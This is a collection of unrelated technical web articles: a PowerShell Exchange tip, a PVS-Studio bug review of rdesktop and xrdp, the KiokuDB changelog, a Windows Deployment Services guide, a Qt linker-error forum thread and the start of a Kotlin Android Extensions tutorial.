The following steps are needed to duplicate the Get-ExCommand function:

1. Open the Windows PowerShell ISE (or some other script editor).
2. Establish a remote session to an Exchange server. Use the New-ExchangeSession function from yesterday's Hey, Scripting Guy! blog.
3. Make an RDP connection to a remote Exchange server and use the Get-Content cmdlet to determine the syntax for the new Get-ExCommand command.
4. Use the Windows PowerShell ISE (or other script editor) to write a new function named Get-ExCommand that contains the commands from Step 3.

In the image that follows, I run the New-ExchangeSession function and make an implicit remoting session to the server named "ex1," which is running Exchange Server 2010. This step brings the Exchange commands into the current Windows PowerShell environment and provides commands to work with when I am creating the new Get-ExCommand function.
Here is a version of the Get-ExCommand function that retrieves all of the Microsoft Exchange commands.

Function Get-ExCommand
{
  Get-Command -Module $global:importresults |
    Where-Object { $_.commandtype -eq 'function' -AND $_.name -match '-' }
} #end function Get-ExCommand

I copied the portion of the function that retrieves the module name from the $global namespace. It came from the contents of the Get-ExCommand function from the server running Exchange Server 2010. One of the nice things about functions is that they allow the code to be read. I added the Where-Object to filter out only the functions. In addition, I added the match clause to look for a "-" in the function name. This portion arose because of the functions that set the working location to the various drive letters.

To search for Exchange cmdlets that work with the database requires the following syntax.

Get-ExCommand | where { $_.name -match 'database' }

That is not too bad, but if I need to type it on a regular basis, it rapidly becomes annoying. In the original Get-ExCommand function, the function uses the $args automatic variable to determine the presence of an argument to the function. When an argument exists, the function uses that and attempts to use the Get-Command cmdlet to retrieve a CmdletInfo object for the command in question. This is helpful because it allows the use of wildcards to discover applicable Windows PowerShell cmdlets for specific tasks. I decided to add a similar capability to my version of the Get-ExCommand function, but instead of using the $args variable, I created a command-line parameter named Name. To me, it makes the script easier to read. The following is the content of the Get-ExCommand function.
Function Get-ExCommand
{
  Param ([string]$name)
  If (!($name))
    { Get-Command -Module $global:importresults |
        Where-Object { $_.commandtype -eq 'function' -AND $_.name -match '-' } }
  Else
    { Get-Command -Module $global:importresults |
        Where-Object { $_.commandtype -eq 'function' -AND $_.name -match '-' -AND $_.name -match $name } }
} #end function Get-ExCommand

The first thing the Get-ExCommand function does is to create the $name parameter. Next, the if statement checks to see if the $name parameter was supplied on the command line. If it was not, the function runs the same command as the previous version. If the $name parameter was supplied, an additional clause matches function names against the value of the $name parameter. The following code illustrates searching for all Exchange commands related to the database.

Get-ExCommand database

The image that follows illustrates using the Get-ExCommand function, and the associated output.

The complete Get-ExCommand function, including comment-based Help, appears in the Scripting Guys Script Repository.

JM, that is all there is to gaining access to the Get-ExCommand command in a remote Windows PowerShell session. Join me tomorrow for more cool stuff. Until then, keep on
https://devblogs.microsoft.com/scripting/gain-remote-access-to-the-get-excommand-exchange-command/
Checking rdesktop and xrdp with PVS-Studio

This is the second post in our series of articles about the results of checking open-source software working with the RDP protocol. Today we are going to take a look at the rdesktop client and xrdp server. The analysis was performed by PVS-Studio. This is a static analyzer for code written in C, C++, C#, and Java, and it runs on Windows, Linux, and macOS.

I will be discussing only those bugs that looked most interesting to me. On the other hand, since the projects are pretty small, there aren't many bugs in them anyway :).

Note. The previous article about the check of FreeRDP is available here.

rdesktop

rdesktop is a free RDP client for UNIX-based systems. It can also run on Windows if built under Cygwin. rdesktop is released under GPLv3. This is a very popular client. It is used as a default client on ReactOS, and you can also find third-party graphical front-ends to go with it. The project is pretty old, though: it was released for the first time on April 4, 2001, and is 17 years old, as of this writing.

As I already said, the project is very small — about 30 KLOC, which is a bit strange considering its age. Compare that with FreeRDP with its 320 KLOC.

Unreachable code

V779 Unreachable code detected. It is possible that an error is present. rdesktop.c 1502

int main(int argc, char *argv[])
{
  ....
  return handle_disconnect_reason(deactivated, ext_disc_reason);

  if (g_redirect_username)
    xfree(g_redirect_username);

  xfree(g_username);
}

The first error is found immediately in the main function: the code following the return statement was meant to free the memory allocated earlier. But this defect isn't dangerous because all previously allocated memory will be freed by the operating system once the program terminates.

No error handling

V557 Array underrun is possible. The value of 'n' index could reach -1.
rdesktop.c 1872

RD_BOOL
subprocess(char *const argv[], str_handle_lines_t linehandler, void *data)
{
  int n = 1;
  char output[256];
  ....
  while (n > 0)
  {
    n = read(fd[0], output, 255);
    output[n] = '\0';                                  // <=
    str_handle_lines(output, &rest, linehandler, data);
  }
  ....
}

The file contents are read into the buffer until EOF is reached. At the same time, this code lacks an error handling mechanism, and if something goes wrong, read will return -1 and the statement output[n] = '\0' will write outside the bounds of the output array.

Using EOF in char

V739 EOF should not be compared with a value of the 'char' type. The '(c = fgetc(fp))' should be of the 'int' type. ctrl.c 500

int
ctrl_send_command(const char *cmd, const char *arg)
{
  char result[CTRL_RESULT_SIZE], c, *escaped;
  ....
  while ((c = fgetc(fp)) != EOF && index < CTRL_RESULT_SIZE && c != '\n')
  {
    result[index] = c;
    index++;
  }
  ....
}

This code implements incorrect EOF handling: if fgetc returns a character whose code is 0xFF, it will be interpreted as the end of file (EOF). EOF is a constant typically defined as -1. For example, in the CP1251 encoding, the last letter of the Russian alphabet is encoded as 0xFF, which corresponds to the number -1 in type char. It means that the 0xFF character, just like EOF (-1), will be interpreted as the end of file. To avoid errors like that, the result returned by the fgetc function should be stored in a variable of type int.

Typos

Snippet 1

V547 Expression 'write_time' is always false. disk.c 805

RD_NTSTATUS disk_set_information(....)
{
  time_t write_time, change_time, access_time, mod_time;
  ....
  if (write_time || change_time)
    mod_time = MIN(write_time, change_time);
  else
    mod_time = write_time ? write_time : change_time;    // <=
  ....
}

The author of this code must have accidentally used the || operator instead of && in the condition. Let's see what values the variables write_time and change_time can have:

- Both variables have 0.
  In this case, execution moves on to the else branch: the mod_time variable will always be evaluated to 0 no matter what the next condition is.
- One of the variables has 0. In this case, mod_time will be assigned 0 (given that the other variable has a non-negative value) since MIN will choose the least of the two.
- Neither variable has 0: the minimum value is chosen.

Changing that line to write_time && change_time will fix the behavior:

- Only one or neither variable has 0: the non-zero value is chosen.
- Neither variable has 0: the minimum value is chosen.

Snippet 2

V547 Expression is always true. Probably the '&&' operator should be used here. disk.c 1419

static RD_NTSTATUS
disk_device_control(RD_NTHANDLE handle, uint32 request, STREAM in, STREAM out)
{
  ....
  if (((request >> 16) != 20) || ((request >> 16) != 9))
    return RD_STATUS_INVALID_PARAMETER;
  ....
}

Again, it looks like the wrong operator was used — either || instead of &&, or == instead of != — because the variable can't store the values 20 and 9 at the same time.

Unlimited string copying

V512 A call of the 'sprintf' function will lead to overflow of the buffer 'fullpath'. disk.c 1257

RD_NTSTATUS disk_query_directory(....)
{
  ....
  char *dirname, fullpath[PATH_MAX];
  ....
  /* Get information for directory entry */
  sprintf(fullpath, "%s/%s", dirname, pdirent->d_name);
  ....
}

If you could follow the function to the end, you'd see that the code is OK, but it may get broken one day: just one careless change will end up with a buffer overflow since sprintf is not limited in any way, so concatenating the paths could take execution beyond the array bounds. We recommend replacing this call with snprintf(fullpath, PATH_MAX, ....).

Redundant condition

V560 A part of conditional expression is always true: add > 0. scard.c 507

static void
inRepos(STREAM in, unsigned int read)
{
  SERVER_DWORD add = 4 - read % 4;
  if (add < 4 && add > 0)
  {
    ....
  }
}

The add > 0 check doesn't make any difference: read % 4 returns a remainder in the range 0 to 3, so add = 4 - read % 4 is always at least 1 and the variable will always be greater than zero.

xrdp

xrdp is an open-source RDP server. The project consists of two parts:

- xrdp — the protocol implementation. It is released under Apache 2.0.
- xorgxrdp — a collection of Xorg drivers to be used with xrdp. It is released under the X11 license (just like MIT, but use in advertising is prohibited).

The development is based on rdesktop and FreeRDP. Originally, in order to be able to work with graphics, you would have to use a separate VNC server or a special X11 server with RDP support, X11rdp, but those became unnecessary with the release of xorgxrdp. We won't be talking about xorgxrdp in this article.

Just like the previous project, xrdp is a tiny one, consisting of about 80 KLOC.

More typos

V525 The code contains the collection of similar blocks. Check items 'r', 'g', 'r' in lines 87, 88, 89. rfxencode_rgb_to_yuv.c 87

static int
rfx_encode_format_rgb(const char *rgb_data, int width, int height,
                      int stride_bytes, int pixel_format,
                      uint8 *r_buf, uint8 *g_buf, uint8 *b_buf)
{
  ....
  switch (pixel_format)
  {
    case RFX_FORMAT_BGRA:
      ....
      while (x < 64)
      {
        *lr_buf++ = r;
        *lg_buf++ = g;
        *lb_buf++ = r;    // <=
        x++;
      }
      ....
  }
  ....
}

This code comes from the librfxcodec library, which implements the jpeg2000 codec to work with RemoteFX. The "red" color channel is read twice, while the "blue" channel is not read at all. Defects like this typically result from the use of copy-paste.

The same bug was found in the similar function rfx_encode_format_argb:

V525 The code contains the collection of similar blocks. Check items 'a', 'r', 'g', 'r' in lines 260, 261, 262, 263. rfxencode_rgb_to_yuv.c 260

while (x < 64)
{
  *la_buf++ = a;
  *lr_buf++ = r;
  *lg_buf++ = g;
  *lb_buf++ = r;
  x++;
}

Array declaration

V557 Array overrun is possible. The value of 'i - 8' index could reach 129.
genkeymap.c 142

// evdev-map.c
int xfree86_to_evdev[137-8+1] = {
  ....
};

// genkeymap.c
extern int xfree86_to_evdev[137-8];

int main(int argc, char **argv)
{
  ....
  for (i = 8; i <= 137; i++) /* Keycodes */
  {
    if (is_evdev)
      e.keycode = xfree86_to_evdev[i - 8];
    ....
  }
  ....
}

In the genkeymap.c file, the array is declared 1 element shorter than implied by the implementation. No bug will occur, though, because the evdev-map.c file stores the correct size, so there'll be no array overrun, which makes it a minor defect rather than a true error.

Incorrect comparison

V560 A part of conditional expression is always false: (cap_len < 0). xrdp_caps.c 616

// common/parse.h
#if defined(B_ENDIAN) || defined(NEED_ALIGN)
#define in_uint16_le(s, v) do \
....
#else
#define in_uint16_le(s, v) do \
{ \
  (v) = *((unsigned short*)((s)->p)); \
  (s)->p += 2; \
} while (0)
#endif

int
xrdp_caps_process_confirm_active(struct xrdp_rdp *self, struct stream *s)
{
  int cap_len;
  ....
  in_uint16_le(s, cap_len);
  ....
  if ((cap_len < 0) || (cap_len > 1024 * 1024))
  {
    ....
  }
  ....
}

The value of a variable of type unsigned short is read into a variable of type int and then checked for being negative, which is not necessary because a value read from an unsigned type into a larger type can never become negative.

Redundant checks

V560 A part of conditional expression is always true: (bpp != 16). libxrdp.c 704

int EXPORT_CC
libxrdp_send_pointer(struct xrdp_session *session, int cache_idx,
                     char *data, char *mask, int x, int y, int bpp)
{
  ....
  if ((bpp == 15) && (bpp != 16) && (bpp != 24) && (bpp != 32))
  {
    g_writeln("libxrdp_send_pointer: error");
    return 1;
  }
  ....
}

The not-equal checks aren't necessary because the first check does the job. The programmer was probably going to use the || operator to filter off incorrect arguments.

Conclusion

Today's check didn't reveal any critical bugs, but it did reveal a bunch of minor defects.
That said, these projects, tiny as they are, are still used in many systems and, therefore, need some polishing. A small project shouldn't necessarily have tons of bugs in it, so testing the analyzer only on small projects isn't enough to reliably evaluate its effectiveness. This subject is discussed in more detail in the article "Feelings confirmed by numbers".

The demo version of PVS-Studio is available on our website.
https://habr.com/en/company/pvs-studio/blog/447878/
Revision history for KiokuDB

0.57  2014-03-25
    - stop using Class::MOP::load_class (perigrin, #4)

0.56  2013-11-07
    - stop importing from multiple JSON versions

0.55  2013-11-05
    - fix failing tests with newer versions of JSON
    - convert to dzil

0.54  2013-06-25
    - packaging issues

0.53  2013-06-25
    - Fix some test issues

0.52  2011-06-27
    - Fix an issue where streaming entries can sometimes cause them to
      disappear.
    - Fix overlap with the new 'union' keyword in
      Moose::Util::TypeConstraints.

0.51  2011-03-31
    - Die with an error when two objects try and register with the same ID
      but don't both do the KiokuDB::Role::ID::Content role.

0.50  2010-10-19
    - Use new instance api in Moose to allow native traits to inline
      properly when used with KiokuDB::Class (doy)

0.49  2010-09-09
    - Merge NUFFIN/0.48 and FLORA/0.48

0.48  2010-08-24 (FLORA release)
    - Avoid warnings from Moose 1.10

0.48  2010-07-31 (NUFFIN release)
    - Reupload with proper MANIFEST

0.47  2010-07-29
    - Avoid warnings from Moose 1.09 (Dave Rolsky)
    - Numerous documentation fixes (David Leadbeater)
    - Move the Japanese translation of the tutorial under POD2::JA to allow
      perldoc -L ja KiokuDB::Tutorial
    - Don't allow the live object cache to grow too big

0.46  2010-06-27
    - s/_03// on the version

0.46_03  2010-06-27
    - Internals change cleanups regarding weakening $entry->{data} with
      passthrough objects
    - fiddle leak tracking code around to avoid keeping temporary refs
      around, which makes Devel::FindRef more useful in the user's leak
      tracker

0.46_02  2010-06-27
    - Support for caching of live objects (i.e.
      immutable ones)
    - Fix the =head1 NAME of Tutorial::JA
    - Move t/set.t into a standalone test fixture

0.46_01  2010-06-20
    - Lots of refactoring to LiveObjects
        - metadata is keyed by ID, not object
        - keep_entries attribute allows entries to be discarded once used
          (defaults to true for compatibility, may change in the future)
        - clear_leaks/leak_tracker attributes
        - remove txn_{begin,commit,rollback} methods, as they require
          maintaining a stack to be properly used (#58166)
    - KiokuDB::Cmd no longer tries to rerun itself after autoinstall, this
      is very flakey when the installation is the result of an upgrade
      instead of a fresh install

0.45  2010-06-05
    - Introduce KiokuDB::Backend::Role::GC which allows backends to
      construct their own garbage collector for the GC command.
    - name mangle inline classes in tests to avoid false failure reports
      (e.g. when a Foo.pm is in @INC)
    - add scoped_txn, txn_begin, txn_commit, txn_rollback

0.44  2010-06-02
    - Remove accidental use of namespace::autoclean instead of
      namespace::clean (doy)
    - Proper fix for class_version this time =(

0.43  2010-05-26
    - Now throws proper error objects instead of unintelligible hash refs
    - Fix JSON serialization (omitted keys necessary for version tracking
      and GIN indexing)
    - Add a 'clone' method to KiokuDB::Set
    - Suppress additional recursion and repeated weaken() warnings
    - Try harder to skip DateTime formatter serialization roundtripping on
      JSON based backends

0.42  2010-04-16
    - Update translation of tutorial (ktat)
    - use RegexpRef type constraint instead of Regexp (Regexp look blessed
      but not in C land) (doy)
    - Force stringification of version objects before serialization
    - 'mongodb' DSN moniker (omega)
    - Typemap support for the REF reftype (just an alias for SCALAR)
    - misc doc fixes

0.41  2010-03-21
    - Re-release without extra crap in the tarball.

0.40  2010-03-21
    - Allow using a JSON string as a DSN, e.g.
      '{"dsn":"dbi:SQLite:foo","schema":"MyApp::DB"}'
    - Added DateTime::Duration to the default typemap

0.39  2010-03-17
    - Allow a backend to provide a default typemap in addition to the
      serializer one
    - call 'register_handle' on duck-typing backends in KiokuDB::BUILD
    - plug a leak where the live object set kept an indirect reference to
      passthrough entries

0.38  2010-03-06
    - Fix a bug where object streams would end prematurely (Graham Barr)

0.37  2010-03-03
    - Resolve long standing issues with TXN::Memory
    - TXN::Memory::Scan role now implements proper enumeration
    - Fixture::TXN::Scan verifies transactional semantics of enumeration
      for all transactional backends
    - Re-enable $linker->queue (fixed coderef failure case)
    - Various doc fixes
    - Class versioning (disabled by default)

0.36  2010-02-20
    - Resolve a bug when deleting objects that are still live:
      lookup($dead_object_id) would still return the object even though
      it's not actually in storage.
    - Don't call $backend->exists with no arguments in FSCK
    - various API methods now just return; when invoked with no arguments,
      instead of potentially erroring at the backend level

0.35  2010-02-05
    - bump dependency version for MooseX::YAML to prevent bad interaction
      with MooseX::Blessed::Reconstruct
    - add insert_nonroot and store_nonroot methods

0.34  2009-10-24
    - fix an incorrect conversion to Try::Tiny (Dylan)
    - remove circular role definition that causes does_role to inf loop
    - loosen the exception matching regex for missing .pm files in @INC to
      address CPAN testers reports with a different formatting for that
      error

0.33  2009-09-23
    - Added Japanese tutorial KiokuDB::Tutorial::JA (ktat)
    - Correct indexing tutorial example (ask)
    - Use done_testing() instead of no_plan (dandv)
    - Fix behavior of KiokuDB::Lazy attributes with a trigger (a Moose
      change caused infinite recursion)
    - add a refresh method (no deep_refresh yet)

0.32  2009-07-30
    - Don't assume all metaclasses have the does_role method
    - Various documentation fixes
    - Add no warnings
      'recursion' to KiokuDB::Linker

0.31  2009-07-06
    - Remove MooseX::Getopt usage from verbosity role
    - Don't depend on KiokuDB::Cmd in makefile, just warn (avoids recursive
      dependency)

0.30  2009-07-05
    - Split KiokuDB::Cmd into a separate distribution

0.29  2009-06-27
    - work around Test::Exception leak relating to closures in 5.8
    - fix various new warnings with Moose

0.28  2009-06-26
    - YAML serializer no longer stores extra data
    - MooseX::Clone is available for entry/reference
    - TypeMap::Entry::Std role was split up to smaller roles
    - TXN::Memory implements get() properly now (but not iterations yet)
    - ->connect("/path/to/config.yml") is now supported
    - propagate errors when loading classes in the linker
    - core reftypes (ARRAY, HASH etc) are handled by the typemap
    - SCALAR refs can be stored in JSON by using a custom typemap
    - Support for serializing closures

0.27  2009-04-20
    - Add roles for digest based IDs
    - Change dep versions of IO and Tie::RefHash::Weak (they were wrong
      under 5.8) (Thanks to Otto Hirr)
    - KiokuDB::Lazy did not have any effect unless the value was a first
      class object. Now it works for all refs (e.g. arrays of objects)
    - TODO list updated
    - correct dry_run option in WithDSN when transactions are unsupported

0.26  2009-04-08
    - avoid using deprecated Moose/Class::MOP features
    - bump deps on Moose and Class::MOP

0.25  2009-03-27
    - attempt to reduce memory usage by using a custom destruction guard
    - only run concurrency stress test if env var is set
    - various doc fixes

0.24  2009-02-28
    - various doc fixes (Dan Dascalescu)
    - fix semantics when a Set::Deferred outlives the scope in which it was
      created and then gets vivified
    - add a test for MooseX::Traits
    - doc improvements
    - concurrency stress test
    - txn_do takes a 'scope' arg (calls new_scope automatically)
    - various doc fixes
    - add KiokuDB::Role::API

0.23  2009-01-25
    - Add KiokuDB::DoNotSerialize trait (MooseX::Storage trait is still
      respected)
    - add Collapser::Buffer, which replaces the various temp attrs.
      Changes from the buffer are only written to live objects after a
      successful write to the backend. This also fixes duplicate
      ID::Content objects being inserted when one is already live.
    - Various doc improvements

0.22  2009-01-17
    - Add TXN::Memory role to provide memory buffered transactions to
      backends only supporting atomicity guarantees (e.g. CouchDB)
    - Documentation improvements
    - Allow skipping of test suite fixtures on broken backends
    - Various minor fixes and improvements

0.21  2009-01-14
    - Readded the dependency on JSON in addition to JSON::XS

0.20  2009-01-13
    - Refactored KiokuDB::TypeMap::Composite out of
      KiokuDB::TypeMap::Default
    - Added KiokuDB::TypeMap::Entry::StorableHook, which allows reusing of
      existing STORABLE_freeze hooks
    - Fixed handling of 'root' flag (was not being properly preserved)
    - Added 'is_root', 'set_root', 'unset_root'
    - Added a 'deep_update' method
    - Now depends on YAML::XS and JSON::XS (not optional deps anymore)
    - Various improvements to command line roles
    - Added a new GC command and a naive mark & sweep collector
    - Added a new Edit command using Proc::InvokeEditor to do a dump and a
      load in a single transaction
    - Added KiokuDB::Role::Intrinsic for objects which want to be collapsed
      intrinsically
    - Added KiokuDB::Role::Immutable for objects which never change after
      being inserted
    - Added KiokuDB::Role::ID::Content for content addressable objects
    - Test suite cleanups
    - Added ID enumeration to Scan role
    - Added 'allow_classes', 'allow_bases' and 'allow_class_builders'
      options to KiokuDB allowing for easy typemap creation.

0.19  2009-01-05
    - Introduce KiokuDB::Stream::Objects, a Data::Stream::Bulk for objects
      that automatically creates a new scope for each block. This makes it
      much harder to leak when iterating through C<all_objects>.

0.18  2009-01-04
    - Fix KiokuDB->connect("foo", @args) when the dsn string has no
      parameters (@args were being ignored)
    - Add a fixture to test that overwriting an entry is not allowed.
0.17  2008-12-30
    - More docs
    - remove KiokuDB::Backend::Null which was historically used for testing
      but is long since useless.
    - remove deprecated command line tools
    - provide a 'txn_do' method in Role::TXN for backends which only
      implement txn_begin, txn_rollback and txn_commit
    - correct plan for t/uuid.t when a module is missing

0.16  2008-12-28
    - Lots of docs
    - Fix KiokuDB::Reference's Storable hook limitation using a simple
      workaround. Not a real fix yet.
    - Remove unnecessary code from the UUID generation roles.
    - In KiokuDB::Cmd::OutputHandle, don't clobber the file before the
      command has actually run (remove EarlyBuild attr)

0.15  2008-12-28
    - Last version was accidentally released off a problematic branch,
      rereleasing without that change

0.14  2008-12-28
    - skip incremental JSON parsing tests if JSON::XS is missing
    - load IO::Handle to attempt to work around some weird test failures

0.13  2008-12-25
    - t/serializer.t was causing bogus failures by not skipping if YAML::XS
      is unavailable
    - Cleanup of ( is => 'rw' ) bits in KiokuDB::Entry that should have
      really had private writers instead
    - Introduce partial handling of anonymous classes created due to
      runtime application of roles ( My::Role->meta->apply($instance) )

0.12  2008-12-24
    - Remove a use Devel::PartialDump that accidentally got committed

0.11  2008-12-24
    - Fetching now queues items so that the backend's get() method is
      called fewer times, with more IDs each time. This significantly
      increases the performance of high latency backends, such as DBI or
      CouchDB.
    - fill in SimpleSearch stub fixture
    - Various fixes for Binary fixture
    - Make the various fields of the JSPON format customizable
    - Serialization is now pluggable using the Delegate serialization role

0.10  2008-12-22
    - Load classes in the typemap resolution code, so that objects whose
      classes aren't necessarily loaded at compile time can still be
      inflated.
    - add 'import_yaml' to KiokuDB::Util
    - Refactor parts of the JSPON file backend into a JSON serialization
      role
    - Don't load thunks when updating partially loaded objects
    - No longer dies if txn_do is used but the backend doesn't support it
      (implicit noop)
    - Add a new role and test for nested transaction supporting backends
      (partial rollback)

0.09  2008-12-17
    - Remove KiokuDB::Resolver, moving ID assignment functionality into the
      collapser and the typemap
    - Fix bogus failures on 5.8 due to weird leaks (perl bug affecting test
      suite)

0.08  2008-12-05
    - Fix a breakage in inflating passthrough intrinsic objects created
      with older versions of KiokuDB
    - Refactor command line tools to use App::Cmd
    - Add KiokuDB::LinkChecker and a FSCK command

0.07  2008-10-31
    - Rename backend roles to KiokuDB::Backend::Role::Foo (omega)
    - Change entry packing format in Storable to something less idiotic

0.06  2008-10-31
    - Use epoch, not ISO 8601 dates in JSPON map by default to avoid issues
      with DateTime::Format::ISO8601 dependency in testing. Will support
      both in the future
    - Fix tied support for JSPON

0.05  2008-10-31
    - Add default typemaps for JSON and Storable serialization

0.04  2008-10-30
    - Fix ->clear in KiokuDB::GIN

0.03  2008-10-28
    - Lots of new docs
    - Smaller set of dependencies
        - Many deps are now optional (skips tests)
        - Some dependencies weren't necessary
        - Hand written code instead of MooseX::AttributeHelpers in live
          objects
    - Fixed a random test failure in live_objects.t that accidentally
      depended on address space ordering

0.02  2008-10-25
    - Lazy meta trait for attributes
    - DoNotSerialize meta trait is now respected
    - Documentation updates
    - Removes several unrelated files from the dist
    - NoGetopt related fixes for command line tools
    - Remove JSPON backend files
    - Dependency fixes
    - KiokuDB::Role::ID

0.01  2008-10-16
    - Initial Release
https://metacpan.org/changes/distribution/KiokuDB
This is the last post in this series. Today we'll use the image we already created, deploy it to our XP test machine, and prepare the Windows Deployment Server to deploy it using PXE boot.

There is one issue with this plan. Some of the tools in the ADK for Windows 8.1 don't support Windows XP (User State Migration Tool version 6.3 and BOOTSECT.EXE). So what can you do? I'll summarize here, but Michael Niehaus wrote about this in detail in his blog. The gist of it is that you need the workarounds he describes there.

Now we are ready to deploy our image. First we will set up Windows Deployment Services to deploy the image using a network-based installation.

1- In Server Manager on our DC01 we'll install the Windows Deployment Services role and the management tools.

2- When prompted by the install wizard, ensure that you select both the Deployment Server and the Transport Server. The Transport Server is used to create multicast namespaces that transmit data. The Deployment Server is used to configure and remotely install Windows operating systems, and it depends on the core parts of the Transport Server. Complete the wizard and finish installing WDS.

3- Once this is done, open the Windows Deployment Services management console from the Tools menu and configure the WDS service.

4- In the Configuration Wizard, select Integrated with Active Directory on the Install Options page.

5- On the Remote Installation Folder Location page, pick a location where WDS will store the boot files and images. In our case we put that on the D: drive.

6- The Proxy DHCP Server page is where we identify whether WDS is co-existing with the DHCP server. In our case it's all on the DC, so we ensure that both check boxes are selected to enable the coexistence.

7- The PXE initial settings allow you to decide how you want to respond to machines requesting boot images and installation. For our lab we selected Respond to all client computers (without requiring administrator approval).
After that, just complete the wizard and finish the configuration.

8- Our WDS server is installed and configured. It's now time to import the boot images from our MDT image so they can be deployed through WDS. Right-click Boot Images and select "Add Boot Image".

9- Browse to D:\DeploymentShare\Boot\ and select LitetouchPE_x86.wim for the 32-bit image. In our case we imported both the 32-bit and 64-bit boot WIM files. Complete the wizard by giving your boot images proper names and descriptions (very useful if you have multiple images).

10- The last thing to do for the WDS server is to start the service by right-clicking the server and, under All Tasks, clicking Start.

That's it. WDS is ready to serve up your MDT image, as noted in the following screen captures of machines with no OS booting from the network to install the image.

From a Windows XP machine in our environment, all we need to do is execute the BDD_Autorun script from \\DC01\deploymentShare$ and follow the instructions to deploy a fresh version of Windows 8 and retain the files and profiles stored locally. (The BDD_ script names are a leftover from when MDT was called the Business Desktop Deployment Toolkit.)

So… you're ready to experiment. Download Windows Server 2012 R2 and create your lab environment (instructions can be found here). We did not go in depth on customizing the deployment and automating it, but there are lots of online resources to help you with that. Now you have one less excuse for not deploying a modern OS.

Have fun!

Cheers!
Pierre Roman | Technology Evangelist
http://blogs.technet.com/b/canitpro/archive/2014/04/17/windows-8-1-deployment-from-the-ground-up-deploy-the-image.aspx
[SOLVED] Unresolved External Symbol Error

Hi All,

I am getting three errors when I try to pass an object to another class. The errors are:

film.obj:-1: error: LNK2001: unresolved external symbol "public: virtual struct QMetaObject const * __cdecl Film::metaObject(void)const " (?metaObject@Film@@UEBAPEBUQMetaObject@@XZ)
film.obj:-1: error: LNK2001: unresolved external symbol "public: virtual void * __cdecl Film::qt_metacast(char const *)" (?qt_metacast@Film@@UEAAPEAXPEBD@Z)
film.obj:-1: error: LNK2001: unresolved external symbol "public: virtual int __cdecl Film::qt_metacall(enum QMetaObject::Call,int,void * *)" (?qt_metacall@Film@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z)

All have "File not found: film.obj" under the errors in red.

The class that I am trying to pass:

#include <QObject>
#include <QString>
#include <QDate>

class Film : public QObject
{
    Q_OBJECT
    Q_PROPERTY(QString title READ getTitle WRITE setTitle)
    Q_PROPERTY(QString director READ getDirector WRITE setDirector)
    Q_PROPERTY(int duration READ getDuration WRITE setDuration)
    Q_PROPERTY(QDate releaseDate READ getReleaseDate WRITE setReleaseDate)

public:
    Film();                                          // Default constructor
    Film(QString t, int dur, QString dir, QDate r);  // Constructor

    void setTitle(QString t);
    void setDuration(int dur);
    void setDirector(QString dir);
    void setReleaseDate(QDate r);

    QString getTitle();
    QString getDirector();
    int getDuration();
    QDate getReleaseDate();

private:
    QString title;
    int duration;
    QString director;
    QDate releaseDate;
};

The class that has to receive it:

Header file:

#include <QtCore>
#include <QTextStream>
#include <QFile>
#include <QString>
#include "film.h"

class FilmWriter
{
public:
    FilmWriter();
    FilmWriter(Film *myFilm);

private:
};

The CPP file:

    out << myFilm->getTitle();
    out << myFilm->getDirector();
    out << myFilm->getDuration();
    out << myFilm->getReleaseDate().toString();

    /*
    out << myFilm.getTitle();
    out << myFilm.getDirector();
    out << myFilm.getDuration();
    out << myFilm.getReleaseDate().toString();
    */

    mFile.flush();
    mFile.close();
}

Please help.
Thanks

- SGaist (Lifetime Qt Champion):
Hi, did you re-run qmake after adding Q_OBJECT to your Film class?

(OP):
Sorted. Thanks for the help.

- SGaist (Lifetime Qt Champion):
You're welcome. Don't forget to update the thread's title, prepending [solved], so other forum users know a solution has been found :)

(Lordon):
Hi, I'm new to Qt. Can you give more information on how to re-run qmake? I have one more question: is the qmake file the same as MyProject.pro, the .pro file in my project?

- mrjj (Qt Champions 2016):
@Lordon Hi and welcome. Yes, MyProject.pro is the qmake file. To re-run it, go to the Build menu and select "Run qmake", to be sure. In rare cases you might also delete your build folder for things to be really remade. To find the build folder, look in the "Projects" tab; it's listed as the Build directory. This folder contains auto-generated files and it is safe to delete everything in it, so in those cases open it in your file explorer and delete it all.

(Lordon):
Oh, my mistake. I forgot to say that I'm working in Visual Studio. There is nothing like "Run qmake" there. Is there any way to do this in Visual Studio?

- mrjj (Qt Champions 2016):
Oh, I have never used VS with Qt, so I'm not sure. Normally you also install the Qt VS plugin that handles all this. Since VS doesn't really use .pro files, I assume you have this plugin, as it sounds like you can compile. Did you install this plugin? If not, you will have the issue that Qt wants a tool called moc.exe run on normal compiles. This tool makes connect and a lot of other core features work. If it's not run, you will see errors like the ones in this thread. What version of VS are you using? Make sure it all matches, version-wise.

@Lordon You don't need to run qmake if you are using Visual Studio with the Qt VS plugin, as VS will set up custom build steps for your .ui files (to run uic) and .h files that use Q_OBJECT (to run moc).
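For readers maintaining the .pro file by hand: these particular LNK2001 errors (metaObject, qt_metacast, qt_metacall) mean the moc-generated code for the Q_OBJECT class was never compiled and linked, which typically happens when the header is not listed so qmake never generates a moc rule for it. A minimal sketch of what the .pro file needs (the file and target names here are assumed from the thread, not taken from the actual project):

```
# MyProject.pro - film.h must be listed under HEADERS so moc processes Q_OBJECT
QT       += core
TARGET    = MyProject
TEMPLATE  = app

SOURCES += main.cpp \
           film.cpp \
           filmwriter.cpp

HEADERS += film.h \
           filmwriter.h
```

After changing the .pro file, re-run qmake (Build > Run qmake in Qt Creator) so the regenerated Makefile picks up the new moc rule.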
Kotlin Android Extensions

Learn about the Kotlin Android Extensions plugin from JetBrains that can help you eliminate much of the boilerplate code in your Android app.

Version - Kotlin 1.2, Android 4.4, Android Studio 3

The Kotlin programming language has improved the Android development experience in many ways, especially since the announcement in 2017 of first-party support for the language. Null safety, extensions, lambdas, the powerful Kotlin standard library and many other features all add up to a better and more enjoyable way to make Android apps.

In addition to the Kotlin language, JetBrains has also developed a plugin for Android called the Kotlin Android Extensions, which was created to further ease everyday Android development. The extensions are a Kotlin plugin that every Android developer should be aware of. In this tutorial, you'll explore many of the features that come with the extensions, including the following main features:

View binding

View binding enables you to refer to views just like any other variable, by using synthetic properties, without the need to initialize view references by calling the ubiquitous findViewById().

Note: If you have used Butter Knife in the past, you'll know that it also helps with view binding. However, the binding is done in a different way. Butter Knife requires you to declare a variable and annotate it with the identifier of the corresponding view. Also, inside methods like Activity onCreate(), you need to call a method that binds all those annotated variables at once. Using the Kotlin Android Extensions, you don't need to annotate any variable. The binding is done the first time you access the corresponding view, and the result is saved into a cache. More on this later.

LayoutContainer

The LayoutContainer interface allows you to use view binding in classes that hold a view, such as the ViewHolder for a RecyclerView.
Parcelize annotation

